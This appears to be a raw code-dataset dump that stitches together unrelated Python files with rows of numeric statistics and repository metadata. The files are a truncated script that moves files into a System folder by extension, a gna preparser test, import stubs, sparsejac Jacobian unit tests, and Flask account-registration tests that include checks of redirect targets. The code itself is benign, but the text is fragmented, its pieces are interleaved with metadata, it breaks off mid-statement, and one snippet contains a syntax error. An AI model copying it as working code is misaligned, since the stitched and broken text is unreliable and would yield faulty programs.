shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".rmt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ruf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".savedsearch" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".saver" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".scr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files
if ".sfcache" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".spi" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".swp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".sys" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".themepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
| 64.064935 | 101 | 0.602676 | 2,093 | 14,799 | 4.206402 | 0.080745 | 0.080304 | 0.102226 | 0.170377 | 0.905157 | 0.902999 | 0.902999 | 0.902999 | 0.902999 | 0.87642 | 0 | 0.001199 | 0.211163 | 14,799 | 230 | 102 | 64.343478 | 0.752955 | 0 | 0 | 0.478469 | 0 | 0 | 0.150575 | 0.003083 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009569 | null | null | 0.004785 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1f792c6dc9c0db4f0f22189362862d9a48bc705b | 671 | py | Python | tests/expression1/pair.py | gnafit/gna | c1a58dac11783342c97a2da1b19c97b85bce0394 | [
"MIT"
] | 5 | 2019-10-14T01:06:57.000Z | 2021-02-02T16:33:06.000Z | tests/expression1/pair.py | gnafit/gna | c1a58dac11783342c97a2da1b19c97b85bce0394 | [
"MIT"
] | null | null | null | tests/expression1/pair.py | gnafit/gna | c1a58dac11783342c97a2da1b19c97b85bce0394 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from gna.expression.preparse import *
s = 'echo ( alsdkfjlskjdf ( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'ec|ho ( alsdkfjlskjdf ( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdk|fjlskjdf ( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf ( lsjd|flksjdf ) )'
print(s)
print(open_fcn(s))
s = 'e|cho ( al|sdkfjlskjdf ( lsjd|flksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf |( lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf (| lsjdflksjdf ) )'
print(s)
print(open_fcn(s))
s = 'echo ( alsdkfjlskjdf ( lsjdflksjdf |) )'
print(s)
print(open_fcn(s))
| 18.135135 | 48 | 0.652757 | 95 | 671 | 4.526316 | 0.273684 | 0.111628 | 0.204651 | 0.27907 | 0.813953 | 0.813953 | 0.813953 | 0.813953 | 0.813953 | 0.716279 | 0 | 0 | 0.166915 | 671 | 36 | 49 | 18.638889 | 0.769231 | 0.029806 | 0 | 0.64 | 0 | 0 | 0.493846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.64 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
2f451b3be74fbe5f6b45d17d927def60d1c1c7c8 | 294 | py | Python | src/spaceone/secret/manager/__init__.py | ku524/secret | c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1 | [
"Apache-2.0"
] | 7 | 2020-06-04T23:01:12.000Z | 2021-01-31T08:41:29.000Z | src/spaceone/secret/manager/__init__.py | ku524/secret | c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1 | [
"Apache-2.0"
] | 2 | 2020-08-05T13:31:53.000Z | 2021-03-07T15:15:14.000Z | src/spaceone/secret/manager/__init__.py | ku524/secret | c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1 | [
"Apache-2.0"
] | 6 | 2020-06-10T01:59:35.000Z | 2021-11-25T06:30:35.000Z | from spaceone.secret.manager.secret_manager import SecretManager
from spaceone.secret.manager.secret_group_manager import SecretGroupManager
from spaceone.secret.manager.secret_connector_manager import SecretConnectorManager
from spaceone.secret.manager.identity_manager import IdentityManager
| 58.8 | 83 | 0.904762 | 34 | 294 | 7.647059 | 0.352941 | 0.25 | 0.276923 | 0.384615 | 0.357692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054422 | 294 | 4 | 84 | 73.5 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f6fa76bfef6702761ddc3ae1665e7f10d46b45f | 15,425 | py | Python | sparsejac_test.py | mfschubert/sparsejac | 3e146cbc48f668c6163837712f2c1fdbe56d8f14 | [
"Apache-2.0"
] | 3 | 2022-02-26T04:52:01.000Z | 2022-03-07T20:58:04.000Z | sparsejac_test.py | mfschubert/sparsejac | 3e146cbc48f668c6163837712f2c1fdbe56d8f14 | [
"Apache-2.0"
] | null | null | null | sparsejac_test.py | mfschubert/sparsejac | 3e146cbc48f668c6163837712f2c1fdbe56d8f14 | [
"Apache-2.0"
] | null | null | null | """Tests for `sparsejac`."""
import jax
import jax.experimental.sparse as jsparse
import jax.numpy as jnp
import networkx
import numpy as onp
import scipy.sparse as ssparse
import unittest
import sparsejac
_SIZE = 50
class JacrevTest(unittest.TestCase):
def test_sparsity_shape_validation(self):
with self.assertRaisesRegex(
ValueError, '`sparsity` must be rank-2, but got shape'):
invalid_sparsity = jsparse.BCOO.fromdense(jnp.ones((5, 5, 5)))
sparsejac.jacrev(lambda x: x, invalid_sparsity)
def test_sparsity_n_sparse_validation(self):
with self.assertRaisesRegex(
ValueError, '`sparsity.n_sparse` must be 2, but got a value of'):
data = jnp.ones((5, 5))
indices = jnp.arange(5)[:, jnp.newaxis]
invalid_sparsity = jsparse.BCOO((data, indices), shape=(5, 5))
assert invalid_sparsity.ndim == 2
assert invalid_sparsity.n_sparse == 1
sparsejac.jacrev(lambda x: x, invalid_sparsity)
def test_input_shape_validation(self):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
jacfn = sparsejac.jacrev(lambda x: x, sparsity)
with self.assertRaisesRegex(
ValueError, '`x` must be rank-1 with size matching'):
jacfn(jnp.ones((10, 5)))
def test_output_shape_validation(self):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
invalid_fn = lambda x: jnp.reshape(x, (10, 5))
jacfn = sparsejac.jacrev(invalid_fn, sparsity)
with self.assertRaisesRegex(
ValueError, '`fn\(x\)` must be rank-1 with size matching'):
jacfn(jnp.ones(_SIZE))
def test_argnums_validation(self):
with self.assertRaisesRegex(
ValueError, '`argnums` must be an integer, but got'):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
sparsejac.jacrev(lambda x: x, sparsity, argnums=(0, 1))
def test_diagonal(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_jit(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
jacfn = sparsejac.jacrev(fn, sparsity)
jacfn = jax.jit(jacfn)
actual = jacfn(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_shuffled(self):
fn = lambda x: jax.random.permutation(jax.random.PRNGKey(0), x**2)
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
expected = jax.jacrev(fn)(x)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_dense(self):
fn = lambda x: jnp.stack((jnp.sum(x), jnp.sum(x)**2, jnp.sum(x)**3))
sparsity = jsparse.BCOO.fromdense(jnp.ones((3, _SIZE)))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d_nonlinear(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')**2
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacrev(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_2d(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacrev(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_convolutional_2d_nonlinear(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()**2
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacrev(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_argnums(self):
def fn(x, y, z):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
return y * convolved + z
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
y = jax.random.uniform(jax.random.PRNGKey(1), shape=(_SIZE,))
z = jax.random.uniform(jax.random.PRNGKey(2), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
with self.subTest():
result = sparsejac.jacrev(fn, sparsity, argnums=0)(x, y, z)
expected = jax.jacrev(fn, argnums=0)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacrev(fn, sparsity, argnums=1)(x, y, z)
expected = jax.jacrev(fn, argnums=1)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacrev(fn, sparsity, argnums=2)(x, y, z)
expected = jax.jacrev(fn, argnums=2)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
def test_has_aux(self):
def fn(x):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
aux = x + 1
return convolved, aux
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
result_jac, result_aux = sparsejac.jacrev(fn, sparsity, has_aux=True)(x)
expected_jac, expected_aux = jax.jacrev(fn, has_aux=True)(x)
onp.testing.assert_array_equal(expected_jac, result_jac.todense())
onp.testing.assert_array_equal(expected_aux, result_aux)
class JacfwdTest(unittest.TestCase):
def test_sparsity_shape_validation(self):
with self.assertRaisesRegex(
ValueError, '`sparsity` must be rank-2, but got shape'):
invalid_sparsity = jsparse.BCOO.fromdense(jnp.ones((5, 5, 5)))
sparsejac.jacfwd(lambda x: x, invalid_sparsity)
def test_sparsity_n_sparse_validation(self):
with self.assertRaisesRegex(
ValueError, '`sparsity.n_sparse` must be 2, but got a value of'):
data = jnp.ones((5, 5))
indices = jnp.arange(5)[:, jnp.newaxis]
invalid_sparsity = jsparse.BCOO((data, indices), shape=(5, 5))
assert invalid_sparsity.ndim == 2
assert invalid_sparsity.n_sparse == 1
sparsejac.jacfwd(lambda x: x, invalid_sparsity)
def test_input_shape_validation(self):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
jacfn = sparsejac.jacfwd(lambda x: x, sparsity)
with self.assertRaisesRegex(
ValueError, '`x` must be rank-1 with size matching'):
jacfn(jnp.ones((10, 5)))
def test_output_shape_validation(self):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
invalid_fn = lambda x: jnp.reshape(x, (10, 5))
jacfn = sparsejac.jacfwd(invalid_fn, sparsity)
with self.assertRaisesRegex(
ValueError, 'Got an invalid compressed Jacobian shape, which can '):
jacfn(jnp.ones(_SIZE))
def test_argnums_validation(self):
with self.assertRaisesRegex(
ValueError, '`argnums` must be an integer, but got'):
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
sparsejac.jacfwd(lambda x: x, sparsity, argnums=(0, 1))
def test_diagonal(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_jit(self):
fn = lambda x: x**2
sparsity = jsparse.BCOO.fromdense(jnp.eye(_SIZE))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
jacfn = sparsejac.jacfwd(fn, sparsity)
jacfn = jax.jit(jacfn)
actual = jacfn(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_diagonal_shuffled(self):
fn = lambda x: jax.random.permutation(jax.random.PRNGKey(0), x**2)
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
expected = jax.jacrev(fn)(x)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_dense(self):
fn = lambda x: jnp.stack((jnp.sum(x), jnp.sum(x)**2, jnp.sum(x)**3))
sparsity = jsparse.BCOO.fromdense(jnp.ones((3, _SIZE)))
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d_nonlinear(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')**2
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_2d(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacfwd(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_convolutional_2d_nonlinear(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()**2
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacfwd(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_argnums(self):
def fn(x, y, z):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
return y * convolved + z
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
y = jax.random.uniform(jax.random.PRNGKey(1), shape=(_SIZE,))
z = jax.random.uniform(jax.random.PRNGKey(2), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
with self.subTest():
result = sparsejac.jacfwd(fn, sparsity, argnums=0)(x, y, z)
expected = jax.jacfwd(fn, argnums=0)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacfwd(fn, sparsity, argnums=1)(x, y, z)
expected = jax.jacfwd(fn, argnums=1)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacfwd(fn, sparsity, argnums=2)(x, y, z)
expected = jax.jacfwd(fn, argnums=2)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
def test_has_aux(self):
def fn(x):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
aux = x + 1
return convolved, aux
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
result_jac, result_aux = sparsejac.jacfwd(fn, sparsity, has_aux=True)(x)
expected_jac, expected_aux = jax.jacfwd(fn, has_aux=True)(x)
onp.testing.assert_array_equal(expected_jac, result_jac.todense())
onp.testing.assert_array_equal(expected_aux, result_aux)
class ConnectivityFromSparsityTest(unittest.TestCase):
def test_output_connectivity_matches_expected(self):
sparsity = onp.asarray(
[[1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 1],
[1, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1]])
sparsity = ssparse.coo_matrix(sparsity)
expected = jnp.asarray(
[[1, 1, 1, 0, 1, 1],
[1, 1, 1, 1, 0, 1],
[1, 1, 1, 1, 0, 1],
[0, 1, 1, 1, 0, 1],
[1, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1]])
actual = sparsejac._output_connectivity_from_sparsity(sparsity)
onp.testing.assert_array_equal(expected, actual.todense())
def test_input_connectivity_matches_expected(self):
sparsity = onp.asarray(
[[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1]])
sparsity = ssparse.coo_matrix(sparsity)
expected = jnp.asarray(
[[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 1]])
actual = sparsejac._input_connectivity_from_sparsity(sparsity)
onp.testing.assert_array_equal(expected, actual.todense())
if __name__ == '__main__':
unittest.main(argv=[''], verbosity=2, exit=False) | 39.652956 | 80 | 0.644279 | 2,246 | 15,425 | 4.301425 | 0.058771 | 0.011593 | 0.012732 | 0.081151 | 0.954663 | 0.95456 | 0.951661 | 0.940482 | 0.926509 | 0.906635 | 0 | 0.028816 | 0.190081 | 15,425 | 389 | 81 | 39.652956 | 0.744497 | 0.001426 | 0 | 0.833333 | 0 | 0 | 0.032537 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 1 | 0.125786 | false | 0 | 0.025157 | 0 | 0.185535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f72c5e850a9f5690f94092a52b49a578aaf6ebd | 123 | py | Python | flash/tabular/classification/__init__.py | alvin-chang/lightning-flash | 481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5 | [
"Apache-2.0"
] | 2 | 2021-06-25T08:42:36.000Z | 2021-06-25T08:49:29.000Z | flash/tabular/classification/__init__.py | alvin-chang/lightning-flash | 481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5 | [
"Apache-2.0"
] | null | null | null | flash/tabular/classification/__init__.py | alvin-chang/lightning-flash | 481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5 | [
"Apache-2.0"
] | null | null | null | from flash.tabular.classification.data import TabularData
from flash.tabular.classification.model import TabularClassifier
| 41 | 64 | 0.886179 | 14 | 123 | 7.785714 | 0.642857 | 0.165138 | 0.293578 | 0.550459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 123 | 2 | 65 | 61.5 | 0.947826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f9eee50d49ca74e3e2a31f70e1e7047ebbfa327 | 16,860 | py | Python | src/backend/web/handlers/tests/account_test.py | guineawheek/ftc-data-take-2 | 337bff2077eadb3bd6bbebd153cbb6181c99516f | [
"MIT"
] | null | null | null | src/backend/web/handlers/tests/account_test.py | guineawheek/ftc-data-take-2 | 337bff2077eadb3bd6bbebd153cbb6181c99516f | [
"MIT"
] | null | null | null | src/backend/web/handlers/tests/account_test.py | guineawheek/ftc-data-take-2 | 337bff2077eadb3bd6bbebd153cbb6181c99516f | [
"MIT"
] | null | null | null | from typing import List
from unittest.mock import ANY, Mock, patch
from urllib.parse import parse_qsl, quote, urlparse
import pytest
from flask import session
from flask.testing import FlaskClient
import backend
from backend.web.handlers.conftest import CapturedTemplate
from backend.web.handlers.tests.helpers import get_page_title
def user_mock(registered: bool = True) -> Mock:
mock = Mock()
mock.is_registered = registered
return mock
def test_register_logged_out(web_client: FlaskClient) -> None:
response = web_client.get("/account/register")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/login"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/register"
}
def test_register_unregistered(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/register")
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_register.html"
assert get_page_title(response.data) == "Account Registration - The Blue Alliance"
assert context["next"] is None
@pytest.mark.parametrize(
"next_url, expected",
[
("https://zachorr.com", None),
("ftp://localhost/account", None),
("localhost/account", "localhost/account"),
],
)
def test_register_unregistered_next(
next_url: str,
expected: str,
captured_templates: List[CapturedTemplate],
web_client: FlaskClient,
) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/register?next={}".format(quote(next_url)))
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_register.html"
assert get_page_title(response.data) == "Account Registration - The Blue Alliance"
assert context["next"] == expected
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_register_register(
next_url: str, expected: str, web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/register?next={}".format(quote(next_url)))
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/account")
def test_register_register_no_account_id(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.post("/account/register", data={"display_name": "Zach"})
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/"
def test_register_register_no_display_name(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.post("/account/register", data={"account_id": "abc"})
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/"
def test_register_register_account_id_mismatch(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.post(
"/account/register", data={"account_id": "efg", "display_name": "Zach"}
)
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/"
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_register_register_account(
next_url: str, expected: str, web_client: FlaskClient
) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), patch.object(
mock, "register"
) as mock_register:
response = web_client.post(
"/account/register?next={}".format(quote(next_url)),
data={"account_id": "abc", "display_name": "Zach"},
)
mock_register.assert_called_with("Zach")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/account")
def test_edit_logged_out(web_client: FlaskClient) -> None:
response = web_client.get("/account/edit")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/login"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/edit"
}
def test_edit_unregistered(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/edit")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/register"
assert dict(parse_qsl(parsed_response.query)) == {
